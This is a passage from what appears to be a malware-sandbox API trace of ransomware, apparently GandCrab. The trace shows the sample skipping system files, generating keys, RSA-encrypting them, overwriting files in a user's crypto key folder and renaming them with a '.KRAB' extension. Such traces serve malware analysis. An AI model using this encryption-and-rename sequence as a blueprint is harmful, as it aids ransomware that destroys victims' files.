(lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="..") returned 1 [0059.170] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b" [0059.170] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.170] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b.KRAB") returned 179 [0059.170] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0059.170] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0059.170] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="desktop.ini") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="autorun.inf") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntuser.dat") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="iconcache.db") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="bootsect.bak") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="boot.ini") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntuser.dat.log") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="thumbs.db") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="KRAB-DECRYPT.html") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="KRAB-DECRYPT.txt") returned -1 [0059.170] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="CRAB-DECRYPT.txt") returned -1 [0059.171] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntldr") returned -1 [0059.171] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="NTDETECT.COM") returned -1 [0059.171] lstrcmpiW (lpString1="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="Bootfont.bin") returned -1 [0059.171] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.171] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbb5d8) returned 1 [0059.171] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0059.172] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0059.172] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0059.172] CryptGenRandom (in: hProv=0xfbb5d8, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0059.172] CryptReleaseContext (hProv=0xfbb5d8, dwFlags=0x0) returned 1 [0059.172] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.172] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbbe58) returned 1 [0059.173] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0059.173] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0059.173] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0059.173] CryptGenRandom (in: hProv=0xfbbe58, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0059.174] CryptReleaseContext (hProv=0xfbbe58, dwFlags=0x0) returned 1 [0059.174] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.174] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbbe58) returned 1 [0059.174] CryptImportKey (in: hProv=0xfbbe58, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd4e0) returned 1 [0059.174] CryptGetKeyParam (in: hKey=0xfbd4e0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0059.174] CryptEncrypt (in: hKey=0xfbd4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0059.175] GetLastError () returned 0x0 [0059.175] CryptDestroyKey (hKey=0xfbd4e0) returned 1 [0059.175] CryptReleaseContext (hProv=0xfbbe58, dwFlags=0x0) returned 1 [0059.175] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbc100) returned 1 [0059.175] CryptImportKey (in: hProv=0xfbc100, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd1a0) returned 1 [0059.175] CryptGetKeyParam (in: hKey=0xfbd1a0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0059.175] CryptEncrypt (in: hKey=0xfbd1a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0059.176] GetLastError () returned 0x0 [0059.176] CryptDestroyKey (hKey=0xfbd1a0) returned 1 [0059.176] CryptReleaseContext (hProv=0xfbc100, dwFlags=0x0) returned 1 [0059.176] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0059.177] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0059.177] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0059.177] ReadFile (in: hFile=0x450, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e57c*=0x35, lpOverlapped=0x0) returned 1 [0059.191] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0xffffffcb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.191] WriteFile (in: hFile=0x450, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x35, lpOverlapped=0x0) returned 1 [0059.191] WriteFile (in: hFile=0x450, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0059.205] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.209] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.209] CloseHandle (hObject=0x450) returned 1 [0059.210] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.210] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b.krab")) returned 1 [0059.211] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.212] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.212] lstrcmpW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2=".") returned 1 [0059.212] lstrcmpW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="..") returned 1 [0059.212] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b" [0059.212] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.212] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b.KRAB") returned 179 [0059.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0059.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0059.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b") returned 174 [0059.212] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="desktop.ini") returned -1 [0059.212] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="autorun.inf") returned -1 [0059.212] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntuser.dat") returned -1 [0059.212] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="iconcache.db") returned -1 [0059.212] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="bootsect.bak") returned -1 [0059.212] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="boot.ini") returned -1 [0059.212] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntuser.dat.log") returned -1 [0059.213] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="thumbs.db") returned -1 [0059.213] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="KRAB-DECRYPT.html") returned -1 [0059.213] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="KRAB-DECRYPT.txt") returned -1 [0059.213] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="CRAB-DECRYPT.txt") returned -1 [0059.213] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="ntldr") returned -1 [0059.213] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="NTDETECT.COM") returned -1 [0059.213] lstrcmpiW (lpString1="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", lpString2="Bootfont.bin") returned -1 [0059.213] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.213] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbb880) returned 1 [0059.214] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0059.214] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0059.214] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0059.214] CryptGenRandom (in: hProv=0xfbb880, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0059.214] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0059.214] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.215] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0xfbbc38) returned 1 [0059.215] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0059.215] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0059.216] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0059.216] CryptGenRandom (in: hProv=0xfbbc38, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0059.216] CryptReleaseContext (hProv=0xfbbc38, dwFlags=0x0) returned 1 [0059.216] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.217] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbbb28) returned 1 [0059.217] CryptImportKey (in: hProv=0xfbbb28, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd1a0) returned 1 [0059.217] CryptGetKeyParam (in: hKey=0xfbd1a0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0059.217] CryptEncrypt (in: hKey=0xfbd1a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0059.218] GetLastError () returned 0x0 [0059.218] CryptDestroyKey (hKey=0xfbd1a0) returned 1 [0059.218] CryptReleaseContext (hProv=0xfbbb28, dwFlags=0x0) returned 1 [0059.218] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0xfbbb28) returned 1 [0059.218] CryptImportKey (in: hProv=0xfbbb28, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0xfbd4e0) returned 1 [0059.218] CryptGetKeyParam (in: hKey=0xfbd4e0, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0059.218] CryptEncrypt (in: hKey=0xfbd4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0059.219] GetLastError () returned 0x0 [0059.219] CryptDestroyKey (hKey=0xfbd4e0) returned 1 [0059.219] CryptReleaseContext (hProv=0xfbbb28, dwFlags=0x0) returned 1 [0059.219] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0059.219] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0059.220] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0059.220] ReadFile (in: hFile=0x450, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e57c*=0x2d, lpOverlapped=0x0) returned 1 [0059.252] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0xffffffd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.253] WriteFile (in: hFile=0x450, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e578*=0x2d, lpOverlapped=0x0) returned 1 [0059.253] WriteFile (in: hFile=0x450, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0059.254] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.259] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.259] CloseHandle (hObject=0x450) returned 1 [0059.260] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.260] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1462094071-1423818996-289466292-1000\\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b.krab")) returned 1 [0059.261] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.261] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.261] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.261] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.261] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock" [0059.261] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.262] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 133 [0059.262] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock") returned 128 [0059.262] lstrlenW (lpString=".lock") returned 5 [0059.262] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.262] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.262] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.262] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.263] FindNextFileW (in: hFindFile=0xfbd620, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.263] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.263] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.263] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt" [0059.263] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.263] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt.KRAB") returned 126 [0059.263] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\KRAB-DECRYPT.txt") returned 121 [0059.263] lstrlenW (lpString=".txt") returned 4 [0059.263] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.263] 